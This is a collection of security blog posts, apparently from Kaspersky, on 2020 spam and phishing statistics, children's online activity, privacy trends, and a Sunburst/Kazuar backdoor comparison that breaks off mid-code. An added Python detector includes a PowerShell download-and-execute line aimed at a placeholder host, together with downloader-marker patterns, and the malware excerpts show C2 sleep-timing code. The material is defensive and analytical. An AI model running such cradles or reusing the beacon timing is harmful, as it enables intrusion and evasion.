Members of the Trojan.Win32.Agentb family were the most frequent (7.75%) malware spread by spammers. The family includes backdoors, capable of disrupting the functioning of a computer, and copying, modifying, locking or deleting data. The Trojan-PSW.MSIL.Agensla family was second with 7.70%. It includes malware that steals data stored by the browser, as well as credentials for FTP and email accounts.

Exploits for the Equation Editor vulnerability, Exploit.MSOffice.CVE-2017-11882, dropped to third place with 6.55%. This family had topped the ranking of malware spread through spam in the previous two years.

Trojan.MSOffice.SAgent malicious documents dropped from second to fourth place with 3.41%. These contain a VBA script that runs PowerShell to covertly download other malware.
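The SAgent chain described above (a macro in an Office document launching PowerShell, which then fetches a payload) is one of the easier ones to spot in endpoint telemetry, because an Office process spawning PowerShell is rare in legitimate use. The Python below is an added example, not Kaspersky code: it scans constructed, simplified process-creation records (the pipe-delimited field names are an assumption for this illustration, not a real product format) and grades each event by how closely it matches that chain.

```python
"""Flag Office-spawned PowerShell download chains in process-creation logs (added example)."""
import re

# Office hosts whose child processes deserve scrutiny.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Command-line fragments typical of macro-launched downloaders / encoded stagers.
DOWNLOAD_HINTS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|iwr\b|net\.webclient|"
    r"start-bitstransfer|-enc(odedcommand)?\b|frombase64string)",
    re.IGNORECASE,
)

# Constructed sample events (assumed 'key=value|key=value' format, not real telemetry).
SAMPLE_EVENTS = [
    "ts=2020-03-02T09:14:07Z|parent=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmd=powershell -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')",
    "ts=2020-03-02T09:15:11Z|parent=C:\\Windows\\explorer.exe"
    "|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmd=powershell Get-ChildItem C:\\Users",
    "ts=2020-03-02T09:16:30Z|parent=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "|image=C:\\Windows\\System32\\cmd.exe|cmd=cmd /c echo hello",
    "ts=2020-03-02T09:17:02Z|parent=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmd=powershell -EncodedCommand SQBFAFgA...",
]


def parse_event(line):
    """Split 'k=v|k=v' into a dict; only the first '=' of each field separates key and value."""
    return dict(field.split("=", 1) for field in line.split("|"))


def basename(path):
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return 'high', 'medium', 'low' or None for one parsed event."""
    parent = basename(event.get("parent", ""))
    image = basename(event.get("image", ""))
    cmd = event.get("cmd", "")
    if parent in OFFICE_PARENTS and image in SHELLS:
        if DOWNLOAD_HINTS.search(cmd):
            return "high"      # Office -> PowerShell with a download or encoded payload marker
        return "medium"        # Office -> PowerShell without an obvious download marker
    if parent in OFFICE_PARENTS:
        return "low"           # Office spawning some other child process
    return None


def scan(lines):
    """Return [(timestamp, severity, command line)] for every suspicious event, in order."""
    hits = []
    for line in lines:
        event = parse_event(line)
        severity = classify(event)
        if severity:
            hits.append((event["ts"], severity, event["cmd"]))
    return hits


if __name__ == "__main__":
    for ts, severity, cmd in scan(SAMPLE_EVENTS):
        print(f"{ts} [{severity}] {cmd}")
```

The severity tiers matter in practice: the Office-to-PowerShell edge alone is worth alerting on, while the command-line markers only raise confidence, because an encoded or obfuscated stager can avoid every keyword in the list.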

In fifth place, with 2.66%, were Backdoor.Win32.Androm modular backdoors, which are also frequently used to deliver other malware to an infected system. These were followed by the Trojan.Win32.Badun family, with 2.34%. The Worm.Win32.WBVB worms, with 2.16%, were seventh. Two families, in eighth and ninth place, contain malware that carefully evades detection and analysis: Trojan.Win32.Kryptik trojans, with 2.02%, use obfuscation, anti-emulation and anti-debugging techniques, while Trojan.MSIL.Crypt trojans, with 1.91%, are heavily obfuscated or encrypted. The Trojan.Win32.ISO family, with 1.53%, rounds out the rankings.

TOP 10 malicious email attachments in 2020

The rankings of malicious attachments largely resemble those of malware families, but there are several subtle differences. For instance, our solutions detected the exploit targeting the CVE-2017-11882 vulnerability more frequently (6.53%) than the most common member of the Agensla family (6.47%). The WBVB worm, with 1.93%, and the Kryptik trojan, with 1.97%, also switched positions. Androm-family backdoors missed the “top ten” entirely, but Trojan-Spy.MSIL.Noon.gen, with 1.36%, which was not represented in the family rankings, was tenth.

Countries targeted by malicious mailshots

Spain was the main target for malicious email campaigns in 2020, its share increasing by 5.03 p.p. to reach 8.48%. As a result of this, Germany, which had topped the rankings since 2015, dropped to second place with 7.28% and Russia, with 6.29%, to third.

Countries targeted by malicious mailshots in 2020

Italy’s share (5.45%) fell slightly, but that country remained in fourth place. Vietnam, which had previously rounded out the top three, dropped to fifth place with 5.20%, and the United Arab Emirates, with 4.46%, to sixth. Mexico, with 3.34%, rose from ninth to seventh place, followed by Brazil, with 3.33%. Turkey, with 2.91%, and Malaysia, with 2.46%, rounded out the rankings, while India, 2.34%, landed in eleventh place last year.

Statistics: phishing

In 2020, Anti-Phishing was able to block 434,898,635 attempts at redirecting users to phishing web pages. That is 32,289,484 fewer attempts than in 2019. A total of 13.21% of Kaspersky users were attacked worldwide, with 6,700,797 masks describing new phishing websites added to the system database.

Attack geography

In 2020, Brazil regained its leadership by number of Anti-Phishing detections, with 19.94% of users trying to open phishing links at least once.

Geography of phishing attacks in 2020

TOP 10 countries by number of attacked users

The countries with the largest numbers of attempts at opening phishing websites in 2018 “topped the rankings” again in 2020: Brazil, with 19.94%, in first place, and Portugal, with 19.73%, in second place. Both countries’ indicators dropped remarkably from 2019, Brazil “losing” 10.32 p.p. and Portugal, 5.9 p.p. France, which had not been seen among the ten “leaders” since 2015, was in third place with 17.90%.

Venezuela, last year’s “leader”, had the largest numbers in the first two quarters of 2020, but came out eighth overall, the share of attacked users in that country decreasing by 14.32 p.p. to 16.84%.

Country          Share of attacked users (%)*
Brazil           19.94
Portugal         19.73
France           17.90
Tunisia          17.62
French Guiana    17.60
Qatar            17.35
Cameroon         17.32
Venezuela        16.84
Nepal            16.72
Australia        16.59

* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2020

Top-level domains

Most scam websites, 24.36% of the total number, had a .com domain name extension last year. Websites with a .ru extension were 22.24 p.p. behind with 2.12%. All other top-level domains in the “top ten” are various country-code TLDs: the Brazilian .com.br with 1.31% in third place, followed by Germany’s .de (1.23%) and Great Britain’s .co.uk (1.20%) in fourth and fifth places, respectively. In sixth place was the Indian domain extension .in, with 1.10%, followed by France’s .fr with 1.08%, and Italy’s .it with 1.06%. Rounding out the rankings were the Dutch .nl, with 1.03%, and the Australian .com.au, with 1.02%.

Most frequent top-level domains for phishing pages in 2020
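Computing a ranking like the one above from a set of phishing URLs is simple, with one catch the figures illustrate: .com.br, .co.uk and .com.au are multi-label suffixes, so naively taking the last host label would fold them into .br, .uk and .au and distort the shares. The Python below is an added example (not Kaspersky’s tooling) that uses a tiny hard-coded suffix set as a stand-in; a production pipeline would consult the Public Suffix List. The sample URLs are constructed placeholders, not real indicators.

```python
"""Group phishing URLs by top-level domain, handling multi-label suffixes (added example)."""
from collections import Counter
from urllib.parse import urlsplit

# Assumption: a tiny stand-in for the Public Suffix List, enough for this example.
MULTI_LABEL_SUFFIXES = {"com.br", "co.uk", "com.au"}


def naive_tld(url):
    """The tempting one-liner: last label only. Wrong for .com.br, .co.uk, .com.au and IPs."""
    host = (urlsplit(url).hostname or "").lower()
    return "." + host.rsplit(".", 1)[-1] if "." in host else None


def extract_tld(url):
    """Return the (possibly two-label) public suffix of the URL's host, or None."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    labels = host.split(".")
    if len(labels) < 2 or labels[-1].isdigit():   # bare host name or IPv4 literal
        return None
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return "." + ".".join(labels[-2:])
    return "." + labels[-1]


def tld_shares(urls, extractor=extract_tld):
    """Percentage share of each TLD among URLs that have one, most common first."""
    counts = Counter(t for t in map(extractor, urls) if t)
    total = sum(counts.values())
    return {t: round(100.0 * n / total, 2) for t, n in counts.most_common()}


# Constructed sample of phishing-style URLs (hosts are placeholders, not real IoCs).
SAMPLE_URLS = [
    "http://login-secure.example.com/verify",
    "https://bank.example.com.br/acesso",
    "http://paket.example.de/",
    "https://tax-refund.example.co.uk/claim",
    "http://post.example.ru/",
    "http://192.0.2.10/login",
    "https://parcel.example.com.au/",
    "http://shop.example.com/",
]

if __name__ == "__main__":
    print("correct:", tld_shares(SAMPLE_URLS))
    print("naive:  ", tld_shares(SAMPLE_URLS, naive_tld))
```

Running both extractors side by side shows the naive version inventing a ".10" TLD for the IP-literal host and attributing the Brazilian and British hosts to .br and .uk, which is exactly the kind of skew that would misplace .com.br, .co.uk and .com.au in a ranking like the one above.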

Organizations under attack

The rating of attacks by phishers on different organizations is based on detections by Kaspersky Lab’s Anti-Phishing deterministic component. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

Last year’s events affected the distribution of phishing attacks across the categories of targeted organizations. The three largest categories had remained unchanged for several years: banks, payment systems and global Internet portals. The year 2020 brought change. Online stores became the largest category with 18.12%, which may be linked to a growth in online orders due to pandemic-related restrictions. Global Internet portals remained the second-largest category at 15.94%, but their share dropped by 5.18 p.p. as compared to 2019, and banks were third with a “modest” 10.72%.

Online games and government and taxes dropped out of the “top ten” in 2020. They were replaced by delivery companies and financial services.

Distribution of organizations targeted by phishers, by category in 2020

Conclusion

With its pandemic and mass transition to remote work and online communication, last year was an unusual one, which was reflected in spam statistics. Attackers exploited the COVID-19 theme, invited victims to non-existent video conferences and insisted that their targets register with “new corporate services”. Given that the fight against the pandemic is not over yet, we can assume that the main trends of 2020 will stay relevant into the near future.

The general growing trend of targeted attacks on the corporate sector will continue into next year, all the more so because the increasingly popular remote work mode makes employees more vulnerable. Users of instant messaging networks should raise their guard, as the amount of spam and phishing messages received on their mobile devices is likely to grow as well. Besides, the number of email messages and schemes exploiting the COVID-19 theme one way or another has a high likelihood of rising.

February 4, 2021

How kids coped with COVID-hit winter holidays

Due to the pandemic situation in late 2020, street festivities got canceled worldwide. For many families, get-togethers with grandparents over the Christmas period were also put on hold. As a result, children across the globe sought holiday fun and games from the comfort of home. And thanks to modern tech and the ubiquitous internet, they had no reason to be bored.

We analyzed and categorized the most popular websites and search queries over the festive period (December 20, 2020 — January 10, 2021) to find out how kids compensated for the lack of outdoor winter entertainment.

How we collect our statistics

Our Kaspersky Safe Kids solution for home users scans the contents of web pages that children try to visit. If the site falls into one of fourteen undesirable categories, the product sends an alert to Kaspersky Security Network. In doing so, no personal data is transmitted and user privacy is not violated. Note:

  • It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. However, anonymous statistics are collected for all 14 categories.
  • The information in this report was obtained from computers running Windows and macOS; mobile statistics are not presented.
Website categorization

Web filtering in Kaspersky Safe Kids currently covers the following categories:

  • Online communication (social networks, messengers, chats, forums)
  • Adult content
  • Alcohol, tobacco, narcotics
  • Violence
  • Weapons, explosives, pyrotechnics
  • Profanity
  • Gambling, lotteries, sweepstakes
  • Video games
  • Electronic commerce (shops, banks, payment systems)
  • Software, audio, video
  • Recruitment
  • Religions, religious associations
  • News media
  • Anonymous access tools
Search query filtering

Children’s search activities best illustrate their interests. Kaspersky Safe Kids can filter kids’ queries in five search engines (Bing, Google, Mail.ru, Yahoo!, Yandex), as well as on YouTube. Filtering targets six potentially dangerous topics: Adult content, Alcohol, Narcotics, Tobacco, Racism and Profanity.

We took as the 100% value the Top 1000 search queries collected from the above search engines, plus YouTube, and separately calculated the Top 1000 search queries for this video platform. The ranking was based on the number of times a query was input, without breakdown by region or language. The popularity of a topic is determined by its share of related queries.

We divided the search queries collected from December 20, 2020 to January 10, 2021 into thematic categories:

  • YouTube
  • Games
  • Translate
  • Communication
  • Music
  • Video platforms
  • Education
  • Shopping
  • Anime
  • Cartoons
  • Other topics

Because YouTube queries account for nearly 50% of the total, they merit a separate category.

What sites were kids interested in?

Distribution of categories of visited sites, December 20, 2020 — January 10, 2021

Most often, children visited websites with video and audio content (40.36%). This is 2.58 p.p. more than the average for the year (June 2019 — May 2020), when the category’s share amounted to 39.11%. In second place was Online communication (25.8%). The share of visits to the web versions of WhatsApp and Telegram, Facebook, Instagram and other sites in this category also increased against the average indicator for the year (24.16%). Third place went to Video games (16.19%), interest in which also grew slightly: data for the period June 2019 — May 2020 showed 15.98%. But the number of visits to online stores turned out lower than the yearly average: 10.94% versus 11.25% in 2019–2020.

What did kids look for during the winter break?

Distribution of Top 1000 search queries by topic, December 20, 2020 — January 10, 2021

Kids’ search activity shines a light on their interests and largely correlates with the stats on website hits. The highest number of searches in the Top 1000 during the winter break mentioned YouTube (20.84%). In second place in terms of popularity were gaming-related queries (15.47%). Kids also often searched for online translation resources (11.02%). The most popular English-language query on this topic was “google translate”.

Software, audio, video

Despite many overlapping interests, kids from one region sometimes showed a greater preference for certain content than their peers elsewhere. In particular, children from South Asia (Bangladesh, India) showed the most interest in audio and video content (52.84%). In the CIS, meanwhile, the share of such content was only 39.2%.

Share of visits to websites in the Software, audio, video category by region, December 20, 2020 — January 10, 2021

YouTube is currently one of the most popular sites; it was there that children spent most of their time during the festive holidays. This is backed up by the data on kids’ search queries: 46% of all Top 1000 queries in the reporting period happened on YouTube; and the most popular search engine query worldwide was “youtube”.

Distribution of Top 1000 search queries by source, December 20, 2020 — January 10, 2021

We decided to see what exactly kids look for inside YouTube itself. To do so, we collected the Top 1000 search queries by children on this platform from December 20, 2020 to January 10, 2021.

Distribution of Top 1000 kids’ search queries on YouTube by topic, December 20, 2020 — January 10, 2021

Most often, children searched for gaming content (37%). In second place are searches for bloggers or channels of a general nature (20.94%). The typical blogger followed by kids usually posts videos related to one or more of the following: challenges, unboxing, DIY, lifestyle, streams of popular games; plus a mandatory music clip. Such bloggers accounted for no less than a fifth of the search queries in our Top 1000.

The third most common YouTube search topic, as expected, is music (17.13%), the most sought-after artists being the Korean pop groups BLACKPINK and BTS, alongside Ariana Grande, Billie Eilish and Travis Scott. The most popular songs were “Baby Shark”, “Dance Monkey” and “Savage Love” (a dance on TikTok with 24 million views).

But YouTube wasn’t the only platform of interest to children. In the Video platforms category (7.59%), children searched for “netflix”, “disney plus”, “amazon prime” and (Russian-speaking kids) “yandex ether”.

The most popular TV series over the festive period, judging by the number of queries, was The Mandalorian.

Video games

The Video games category ranks third by number of website visits by children worldwide. The most likely to visit gaming sites were kids in Asia (25.10%). But those in South Asia, as we saw above, prefer video and audio content to games, which accounted for only 5.21% there.

Share of visits to websites in the Video games category by region, December 20, 2020 — January 10, 2021

Among the search queries, gaming is the second most popular topic after queries related to YouTube. The three most popular queries in the reporting period were “roblox”, “among us” and “minecraft”.

Moreover, most kids’ searches on YouTube were for channels of streamers who play live games and bloggers who specialize in Minecraft.

Shares of grouped search queries in the Top 1000 queries on the topic of video games on YouTube, December 20, 2020 — January 10, 2021

The most popular gaming blogger among English speakers for many years now has been PewDiePie, and among Russian speakers Pozzi. The most popular kids’ games, judging by YouTube search activity, are Among Us, Minecraft, Brawl Stars and Gacha Life. The last of these lets players create video stories to watch on YouTube, which kids simply love.

As we predicted in the runup to the festive period, kids couldn’t get enough of the Nintendo Switch game console. During the winter break, kids searched for “nintendo switch” and “nintendo switch lite” more often than “ps5”. One of the biggest-hit Nintendo Switch games was Just Dance.

Interests worth a special mention

In some regions winter break starts earlier or later than in others, which is why education (5.34%) was still a popular search topic. English-speaking children, for example, most often searched for “google classroom”.

During the holidays, children took an interest in DIY instruction videos. The most popular YouTube channels on this topic are 5-Minute Crafts (70 million+ subscribers), Troom Troom (21.7 million) and 123 GO! (around 10 million). Accordingly, the most popular DIY-themed searches among kids were “5 minute crafts”, “troom troom” and “123 go”.

5-Minute Crafts channel on YouTube

Besides musicians and bloggers, the personalities that children inquired about most during the winter break were Donald Trump (searched for more than any other famous figure), Emma Watson and Elon Musk.

Despite ASMR videos having been around forever (almost), we observed that kids have become more interested in them lately. Among the frequent searches were “asmr” and “asmr eating”.

This winter was not without challenges (in every sense of the word). As for the online variety, Try Not To Laugh was the most popular during the holiday period. Children searched for it not only in English, but also, for example, in German “versuche nicht zu lachen”.

If you think kids had no time for TikTok, think again. In addition to the general queries “tiktok” and “tik tok”, they searched for “tik tok mashup”, “how to change restricted mode on tiktok”.

Conclusion

Despite the absence of Christmas fairs and New Year parties, children still found plenty of entertainment, and not only of the consumerist kind. Going by the popularity of DIY videos, kids enjoy tinkering and making things by hand, while their passion for Gacha Life reveals a desire to tell and screen their own stories. TikTok inspires them to get off the couch and shoot all kinds of videos, not just silly ones. K-pop makes it impossible to sit still, and kids love learning dance moves from music clips and special dance videos. Contrary to the stereotype, video games can also help kids stay physically active: for example, on the Nintendo Switch, the smash-hit Just Dance, which teaches dance moves, and the fitness games Ring Fit Adventure and Fitness Boxing 2: Rhythm & Exercise, released in early December 2020.

Modern technologies are deeply integrated into all our lives, and especially for children who have no recollection of a world without video games, YouTube and messengers at their beck and call. And that’s no bad thing, because today’s kids know how to diversify their leisure time without leaving home. We adults would do well to take a leaf from their virtual book.

January 28, 2021

Privacy predictions for 2021

2020 saw an unprecedented increase in the importance and value of digital services and infrastructure. From the rise of remote working and the global shift in consumer habits to huge profits booked by internet entertainers, we are witnessing how overwhelmingly important the connected infrastructure has become for the daily functioning of society.

What does all this mean for privacy? With privacy more often than not being traded for convenience, we believe that for many 2020 has fundamentally changed how much privacy people are willing to sacrifice in exchange for security (especially from the COVID-19 threat) and access to digital services. How are governments and enterprises going to react to this in 2021? Here are some of our thoughts on what the coming year may look like from the privacy perspective, and which diverse and sometimes contrary forces are going to shape it.

  1. Smart health device vendors are going to collect increasingly diverse data – and use it in increasingly diverse ways.

    Heart rate monitors and step counters are already a standard in even the cheapest smart fitness band models. More wearables, however, now come with an oximeter and even an ECG, allowing you to detect possible heart rate issues before they can even cause you any trouble. We think more sensors are on the way, with body temperature among the most likely candidates. And with your body temperature being an actual public health concern nowadays, how long before health officials want to tap into this pool of data? Remember, heart rate and activity tracker data – as well as consumer gene sequencing – has already been used as evidence in a court of law. Add in more smart health devices, such as smart body scales, glucose level monitors, blood pressure monitors and even toothbrushes and you have huge amounts of data that is invaluable for marketers and insurers.

  2. Consumer privacy is going to be a value proposition, and in most cases cost money.

    Public awareness of the perils of unfettered data collection is growing, and the free market is taking notice. Apple has publicly clashed with Facebook claiming it has to protect its users’ privacy, while the latter is wrestling with regulators to implement end-to-end encryption in its messaging apps. People are more and more willing to choose services that have at least a promise of privacy, and even pay for them. Security vendors are promoting privacy awareness, backing it with privacy-oriented products; incumbent privacy-oriented services like DuckDuckGo show they can have a sustainable business model while leaving you in control of your data; and startups like You.com claim you can have a Google-like experience without the Google-like tracking.

  3. Governments are going to be increasingly jealous of big-tech data hoarding – and increasingly active in regulation.

    The data that the big tech companies have on people is a gold mine for governments, democratic and oppressive alike. It can be used in a variety of ways, from using geodata to build more efficient transportation to sifting through cloud photos to fight child abuse and peeking into private conversations to silence dissent. However, private companies are not really keen on sharing it. We have already seen governments around the world oppose companies’ plans to end-to-end encrypt messaging and cloud backups, pass legislation forcing developers to plant backdoors into their software, or voice concerns with DNS-over-HTTPS, as well as more laws regulating cryptocurrency being enacted everywhere, and so on and so forth. But big tech is called big for a reason, and it will be interesting to see how this confrontation develops.

  4. Data companies are going to find ever more creative, and sometimes more intrusive, sources of data to fuel the behavioral analytics machine.

    Some sources of behavioral analytics data are so common we can call them conventional, such as using your recent purchases to recommend new goods or using your income and spending data to calculate credit default risk. But what about using data from your web camera to track your engagement in work meetings and decide on your yearly bonus? Using online tests that you take on social media to determine what kind of ad will make you buy a coffee brewer? The mood of your music playlist to choose the goods to market to you? How often you charge your phone to determine your credit score? We have already seen these scenarios in the wild, but we are expecting the marketers to get even more creative with what some data experts call AI snake oil. The main implication of this is the chilling effect of people having to weigh every move before acting. Imagine knowing that choosing your Cyberpunk 2077 hero’s gender, romance line and play style (stealth or open assault) will somehow influence some unknown factor in your real life down the line. And would it change how you play the game?

  5. Multi-party computations, differential privacy and federated learning are going to become more widely adopted – as well as edge computing.

    It is not all bad news. As companies become more conscious as to what data they actually need and consumers push back against unchecked data collection, more advanced privacy tools are emerging and becoming more widely adopted. From the hardware perspective, we will see more powerful smartphones and more specialized data processing hardware, like Google Coral, Nvidia Jetson, Intel NCS enter the market at affordable prices. This will allow developers to create tools that are capable of doing fancy data processing, such as running neural networks, on-device instead of the cloud, dramatically limiting the amount of data that is transferred from you to the company. From the software standpoint, more companies like Apple, Google and Microsoft are adopting differential privacy techniques to give people strict (in the mathematical sense) privacy guarantees while continuing to make use of data. Federated learning is going to become the go-to method for dealing with data deemed too private for users to share and for companies to store. With more educational and non-commercial initiatives, such as OpenMined, surrounding them, these methods might lead to groundbreaking collaborations and new results in privacy-heavy areas such as healthcare.
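To make “strict (in the mathematical sense)” concrete, here is the Laplace mechanism, the basic building block of differential privacy, as an added example (not code from any of the vendors or initiatives named above). It releases a noisy count over constructed records and checks the guarantee behind the word “strict”: adding or removing any one person’s record changes the probability of any released value by at most a factor of e^ε. The record format and the predicate are assumptions for illustration.

```python
"""Laplace mechanism for an epsilon-differentially-private count (added example)."""
import math
import random


def laplace_scale(sensitivity, epsilon):
    """Noise scale b = sensitivity / epsilon. A counting query has sensitivity 1:
    one person can change the true count by at most 1."""
    if epsilon <= 0 or sensitivity <= 0:
        raise ValueError("sensitivity and epsilon must be positive")
    return sensitivity / epsilon


def laplace_sample(scale, rng):
    """Draw from Laplace(0, scale) by inverting its CDF on a uniform in (-0.5, 0.5)."""
    u = rng.random() - 0.5
    while abs(u) >= 0.5:            # rng.random() can return exactly 0.0; resample
        u = rng.random() - 0.5
    return -scale * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))


def laplace_pdf(x, scale):
    return math.exp(-abs(x) / scale) / (2.0 * scale)


def privacy_loss(x, scale, shift=1.0):
    """ln(p(x) / p(x + shift)): how much one record, which moves the true count by
    `shift`, changes the likelihood of seeing output x. For Laplace noise this is
    bounded by shift / scale, i.e. by epsilon for a sensitivity-1 query."""
    return math.log(laplace_pdf(x, scale) / laplace_pdf(x + shift, scale))


def noisy_count(records, predicate, epsilon, rng):
    """Release count(records matching predicate) + Laplace(0, 1 / epsilon)."""
    exact = sum(1 for r in records if predicate(r))
    return exact + laplace_sample(laplace_scale(1.0, epsilon), rng)


# Constructed records (assumption: one row per user with a per-category flag).
RECORDS = [{"user": f"u{i}", "visited_gambling": i % 3 == 0} for i in range(12)]


def demo(seed=2021, epsilon=0.5):
    """Return (exact count, released noisy count, worst observed privacy loss)."""
    rng = random.Random(seed)
    exact = sum(1 for r in RECORDS if r["visited_gambling"])
    released = noisy_count(RECORDS, lambda r: r["visited_gambling"], epsilon, rng)
    scale = laplace_scale(1.0, epsilon)
    worst = max(abs(privacy_loss(x / 4.0, scale)) for x in range(-80, 80))
    return exact, released, worst


if __name__ == "__main__":
    exact, released, worst = demo()
    print(f"exact={exact} released={released:.2f} max_privacy_loss={worst:.3f}")
```

The last value printed is the point of the exercise: no matter which output is observed, the log-likelihood ratio between the two neighbouring datasets never exceeds ε, so the released figure reveals little about any single user. The cost is accuracy, which degrades as ε shrinks (scale 1/ε), and the budget is consumed additively: asking the same ε-private question twice spends 2ε.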

We have seen over the last decade, and the last few years in particular, how privacy has become a hot-button issue at the intersection of governmental, corporate and personal interests, and how it has given rise to such different and sometimes even conflicting trends. In more general terms, we hope this year helps us, as a society, to move closer to a balance where the use of data by governments and companies is based on privacy guarantees and respect of individual rights.

January 11, 2021

Sunburst backdoor – code overlaps with Kazuar

Introduction

On December 13, 2020, FireEye published a blog post detailing a supply chain attack leveraging Orion IT, an infrastructure monitoring and management platform by SolarWinds. In parallel, Volexity published an article with their analysis of related attacks, attributed to an actor named “Dark Halo”. FireEye did not link this activity to any known actor; instead, they gave it an unknown, temporary moniker – “UNC2452”.

This attack is remarkable from many points of view, including its stealthiness, precision targeting and the custom malware leveraged by the attackers, named “Sunburst” by FireEye.

In a previous blog, we dissected the method used by Sunburst to communicate with its C2 server and the protocol by which victims are upgraded for further exploitation. Similarly, many other security companies published their own analysis of the Sunburst backdoor, various operational details and how to defend against this attack. Yet, besides some media articles, no solid technical papers have been published that could potentially link it to previously known activity.

While looking at the Sunburst backdoor, we discovered several features that overlap with a previously identified backdoor known as Kazuar. Kazuar is a .NET backdoor first reported by Palo Alto in 2017. Palo Alto tentatively linked Kazuar to the Turla APT group, although no solid attribution link has been made public. Our own observations indeed confirm that Kazuar was used together with other Turla tools during multiple breaches in past years.

A number of unusual, shared features between Sunburst and Kazuar include the victim UID generation algorithm, the sleeping algorithm and the extensive usage of the FNV-1a hash.

We describe these similarities in detail below.

For a summary of this analysis and FAQs, feel free to scroll down to “Conclusions”.

We believe it’s important that other researchers around the world investigate these similarities and attempt to discover more facts about Kazuar and the origin of Sunburst, the malware used in the SolarWinds breach. If we consider past experience, looking back to the WannaCry attack, in the early days, there were very few facts linking them to the Lazarus group. In time, more evidence appeared and allowed us, and others, to link them together with high confidence. Further research on this topic can be crucial in connecting the dots.

More information about UNC2452, DarkHalo, Sunburst and Kazuar is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports[at]kaspersky.com

Technical Details

Background

While looking at the Sunburst backdoor, we discovered several features that overlap with a previously identified backdoor known as Kazuar. Kazuar is a .NET backdoor first reported by Palo Alto in 2017.
Throughout the years, Kazuar has been under constant development. Its developers have been regularly improving it, switching from one obfuscator to another, changing algorithms and updating features. We looked at all versions of Kazuar since 2015, in order to better understand its development timeline.

Kazuar development and evolution timeline

In the following sections, we look at some of the similarities between Kazuar and Sunburst. First, we will discuss how a particular feature is used in Kazuar, and then we will describe the implementation of the same feature in Sunburst.

Comparison of the sleeping algorithms

Both Kazuar and Sunburst have implemented a delay between connections to a C2 server, likely designed to make the network activity less obvious.

Kazuar

Kazuar calculates the time it sleeps between two C2 server connections as follows: it takes two time periods, the minimal sleeping time and the maximal sleeping time, and calculates the waiting period with the following formula:

generated_sleeping_time = sleeping_time_min + x * (sleeping_time_max - sleeping_time_min)

where x is a random floating-point number ranging from 0 to 1 obtained by calling the NextDouble method, while sleeping_time_min and sleeping_time_max are time periods obtained from the C2 configuration, which can be changed with the help of a backdoor command. As a result of the calculation, the generated time falls in the [sleeping_time_min, sleeping_time_max] range. By default, sleeping_time_min equals two weeks and sleeping_time_max equals four weeks in most samples of Kazuar we analysed. After calculating the sleeping time, it invokes the Sleep method in a loop.

Kazuar implements this algorithm in the following lines of code (class names were omitted from the code for clarity):

    long random_multiplication(Random random_0, long long_0)
    {
        return (long)(random_0.NextDouble() * (double)long_0);
    }

    TimeSpan get_randomized_sleeping_time(Random random_0, TimeSpan timeSpan_0, TimeSpan timeSpan_1)
    {
        if (timeSpan_0 > timeSpan_1)
        {
            TimeSpan timeSpan = timeSpan_0;
            timeSpan_0 = timeSpan_1;
            timeSpan_1 = timeSpan;
        }
        long num = random_multiplication(random_0, timeSpan_1.Ticks - timeSpan_0.Ticks); // randomize the sleeping time
        return new TimeSpan(timeSpan_0.Ticks + num);
    }

    TimeSpan get_remaining_time(TimeSpan timeSpan_0, TimeSpan timeSpan_1)
    {
        if (!(timeSpan_0 > timeSpan_1))
        {
            return timeSpan_0;
        }
        return timeSpan_1;
    }

    void wait_between_connections()
    {
        for (;;) // the sleeping loop
        {
            TimeSpan[] array = get_min_and_max_sleep_time();
            /* the previous line retrieves sleeping_time_min and sleeping_time_max from the configuration */
            TimeSpan timeSpan = get_randomized_sleeping_time(this.random_number, array[0], array[1]);
            DateTime last_c2_connection = get_last_c2_connection();
            TimeSpan timeSpan2 = DateTime.Now - last_c2_connection;
            if (timeSpan2 >= timeSpan)
            {
                break; /* enough time has passed, the backdoor may connect to the C2 server */
            }
            TimeSpan timeout = get_remaining_time(timeSpan - timeSpan2, this.timespan); // this.timespan equals 1 minute
            Thread.Sleep(timeout);
        }
    }

Sunburst

Sunburst uses exactly the same formula to calculate sleeping time, relying on NextDouble to generate a random number. It then calls the sleeping function in a loop. The only difference is that the code is somewhat less complex. Below we compare an extract of the sleeping algorithm found in Kazuar and the code discovered in Sunburst.

Kazuar. The listed code is used in multiple versions of the backdoor, including samples with MD5 150D0ADDF65B6524EB92B9762DB6F074 (2016) and 1F70BEF5D79EFBDAC63C9935AA353955 (2019+). The random waiting time generation algorithm and the sleeping loop.

    long random_multiplication(Random random_0, long long_0)
    {
        return (long)(random_0.NextDouble() * (double)long_0);
    }

    TimeSpan get_randomized_sleeping_time(Random random_0, TimeSpan timeSpan_0, TimeSpan timeSpan_1)
    {
        if (timeSpan_0 > timeSpan_1)
        {
            TimeSpan timeSpan = timeSpan_0;
            timeSpan_0 = timeSpan_1;
            timeSpan_1 = timeSpan;
        }
        long num = random_multiplication(random_0, timeSpan_1.Ticks - timeSpan_0.Ticks);
        return new TimeSpan(timeSpan_0.Ticks + num);
    }

    void wait_between_connections()
    {
        for (;;)
        {
            ...
            if (timeSpan2 >= timeSpan)
            {
                break;
            }
            TimeSpan timeout = get_remaining_time(timeSpan - timeSpan2, this.timespan);
            Thread.Sleep(timeout);
        }
    }

Sunburst. MD5 2C4A910A1299CDAE2A4E55988A2F102E. The random waiting time generation algorithm and the sleeping loop.

    private static void DelayMs(double minMs, double maxMs)
    {
        if ((int)maxMs == 0)
        {
            minMs = 1000.0;
